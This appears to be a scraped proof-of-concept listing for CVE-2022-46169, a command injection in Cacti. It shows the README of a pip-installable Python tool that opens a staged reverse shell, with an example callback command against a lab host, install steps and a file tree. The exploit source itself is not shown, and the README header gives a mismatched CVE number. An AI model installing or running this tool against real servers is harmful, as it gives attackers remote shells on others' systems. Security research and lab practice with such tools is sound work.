CVE-2022-46169 PoC — Cacti 命令注入漏洞

Source

Associated Vulnerability

Description

🐍 Python Exploit for CVE-2022-46169

Readme

# CVE-2022-41343
🐍 Python Exploit for CVE-2022-46169

Staged Reverse Shell for Cacti <= 1.2.22

## Example
```
cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb
```

## Usage
```bash
usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Cacti Server URL
  -s SHELL, --shell SHELL
                        Remote Shell (default: /bin/bash)
```
## PyPi Installation
```bash
python3 -m pip install cve-2022-46169
```

## Manual Installation
```bash
python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-46169/releases/download/1.0.0/cve_2022_46169-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/582570.svg)](https://asciinema.org/a/582570?autoplay=1)

File Snapshot

 [4.0K]  /data/pocs/575e157aa68525574a9f9bf89e038583b10ad017
├── [1.0K]  LICENSE
├── [ 735]  pyproject.toml
├── [ 956]  README.md
└── [4.0K]  src
    ├── [4.0K]  cve_2022_46169
    │   ├── [   0]  __init__.py
    │   └── [5.3K]  main.py
    └── [4.0K]  cve_2022_46169.egg-info
        ├── [   1]  dependency_links.txt
        ├── [  59]  entry_points.txt
        ├── [1.5K]  PKG-INFO
        ├── [   5]  requires.txt
        ├── [ 344]  SOURCES.txt
        └── [  15]  top_level.txt

3 directories, 11 files

Remarks